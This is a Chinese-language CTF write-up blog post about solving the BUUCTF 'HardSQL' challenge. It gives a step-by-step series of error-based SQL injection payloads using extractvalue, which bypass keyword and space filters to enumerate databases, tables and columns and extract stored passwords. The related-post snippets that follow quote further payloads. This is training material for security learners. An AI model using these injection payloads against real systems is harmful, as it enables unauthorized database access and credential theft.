第二十五题——[极客大挑战 2019]HardSQL

最新推荐文章于 2024-05-04 17:16:12 发布
最新推荐文章于 2024-05-04 17:16:12 发布
阅读量148 收藏
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115752412
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,使用sql注入

在这里插入图片描述

第二步:进行简单测试

  1. 测试万能密码1'or 1=1#,发现被拦截
    在这里插入图片描述

  2. 测试and,union select发现被拦截

  3. 测试extractvalue发现没有被拦截
    在这里插入图片描述

  4. 测试extractvalue带空格发现被拦截

  5. 综上:可以使用^代替and,将关键字使用()包裹代替空格

第三步:获取数据库

  1. 在密码一栏输入1'^extractvalue(1,concat(1,(select(group_concat(schema_name))from(information_schema.schemata))))#获取所有数据库名,发现显示不完整
    在这里插入图片描述

  2. 使用right函数获取剩下的数据1'^extractvalue(1,concat(1,(select(right(group_concat(schema_name),32))from(information_schema.schemata))))#
    在这里插入图片描述

  3. 综上可知在geek数据库里查找

第四步:获取表名

  1. 使用1'^extractvalue(1,concat(1,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))#获取表名:H4rDsq1
    在这里插入图片描述

获取字段名以及flag

  1. 使用1'^extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))#获取字段名
    在这里插入图片描述

  2. 查看username内容:1'^extractvalue(1,concat(1,(select(username)from(geek.H4rDsq1))))#
    在这里插入图片描述

  3. 查看password获取flag:1'^extractvalue(1,concat(1,(select(password)from(geek.H4rDsq1))))#,发现没有显示完全
    在这里插入图片描述

  4. 使用right获取后半部分:1'^extractvalue(1,concat(1,(select(right(password,32))from(geek.H4rDsq1))))#
    在这里插入图片描述

知识点

1、基于extractvalue的报错注入

地址

2、sql中left与right函数

地址

想学习安全的小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
最新发布
06-23
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请...
[极客挑战 2019]HardSQL
wuuconix's blog
04-02 1341
[极客挑战 2019]HardSQL 这道如同目所说,真的是很难了,花了很长时间做出来了之后,对之前的sql注入的知识更加熟练了,也学习到了新的知识,新知与旧知混合在一起,最终成功得到flag的时候,我竟然有了一种sql注入入门的错觉。不过确实,在这道之后我觉得我对sql注入的目大体的思路已经形成了。 那就趁我刚刚做完,我就来聊一下我认为的sql注入目的思路吧! 这道可能很难,给你过滤了各种函数,各种关键字,可能还没有回显。但是我们的目的永远是一致的。找到flag藏在哪里。 要
非常经典的一道SQL报错注入目[极客挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1408
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
[极客挑战 2019]HardSQL 1
qq_44724114的博客
05-04 480
右键选择send to intruder——选择爆破点(这里我只选了password为爆破点)选择已经准备好的字典,下面的字典不全,但也勉强能用。我这里Length 如果是784的就不能跑 799的可以;具体的可以看Response的提示来判断。
BUUCTF [web专项25][极客挑战 2019]HardSQL
yanglinchiji的博客
11-05 252
right(password,32) (可以换成30,因为后面还有个}和~,32只是因为没有影响就没改)尝试报错注入(datexml和extractvalue两种,但是我看别人的wp都有,挺全的)那就用^代替and,用()代替空格,like代替等于号(如果还有需要代替的后面再说)发现这次过滤的很全,万能密码没有一个可以使用。经过测试,至少and,空格,等于 等被过滤。我们可以用right函数来获取后面的字符。发现只有一半,因为只能输出32字符。老常客了,进入后先用万能密码试试。拼凑即可获得flag。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
报错注入 [极客挑战 2019]HardSQL1
m0_75178803的博客
11-21 827
而第二个参数xpath_string(xpath格式的字符串),我们在注入的时候把第二个参数变为非xpath格式自然会报错。或者1'^(updatexml(1,concat(0x7e,database(),0x7e),1))#①or是或运算,A or B的结果:当A、B中只要有一个或者两个都为1时,结果为1,否则为0;②xor是异或运算,A xor B的结果:当A、B两个不同时结果为1,否则为0。因为我们在上面的尝试中发现and,union,空格是被过滤的。输入1' and 1=2 #
Buuctf:[极客挑战 2019]HardSQL
fcz___的博客
03-12 272
payload:用户名:1’^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#密码:1。可以看到,or, by, and union 等都过滤了。好我们先记下这半边,查一下又半边再接上就行了。好家伙,又是他.这次他又有能耐了。我们先试试万能能密码。我们跑个fuzz看看过滤了啥。
极客挑战2019Hard SQL注入解
Bird&Bird
10-26 1266
1、打开BUUCTF在线评测,选择web----->【极客挑战2019HardSQL。 2、首先使用万能密码试一下,报错了。 3、普通方式union select注入,报同样错误 4、双写绕过试一下,还是报同样错误。 5、 那使用报错注入试一下吧。但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号。 爆库名 username=admin&password=123456'^extractvalue(1,concat(0x5c,(select(data.
BUUCTF之[极客挑战 2019]HardSQL ----报错注入extractvalue和updatexml
weixin_44632787的博客
07-27 551
BUUCTF之[极客挑战 2019]HardSQL ----报错注入extractvalue和updatexml 目 经过手工测试可以发现过滤:and,/**/,空格,等于号(=),大于号(>)和联合查询union等多个关键词 一般来说,SQL注入有这4个步骤: 爆数据库:select database() 爆数据表:select group_concat(table_name) from information_schema.tables where table_schema=databas
BUUCTF之HardSQL[极客挑战 2019]
金 帛的博客
06-06 1295
buucft记录贴
极客挑战 Hardsql
weixin_45751765的博客
08-30 576
0x00 前言 a.sql注入fuzzing 碰到sql注入时,为尽快确认过滤列,可做一个fuzzing_test 注意一次发太多包会429,适当调节引擎 可以看到736都是被过滤的
极客挑战2019Hardsql
uuzfumo的博客
11-06 379
SQL注入报错注入类型的相关目,涉及一部分的绕过知识
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个目,它是一个简单的 SQL 数据库查询目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据目要求来编写 SQL 查询语句,从而得到正确的结果。这道的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问,我可以帮助你更详细地解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值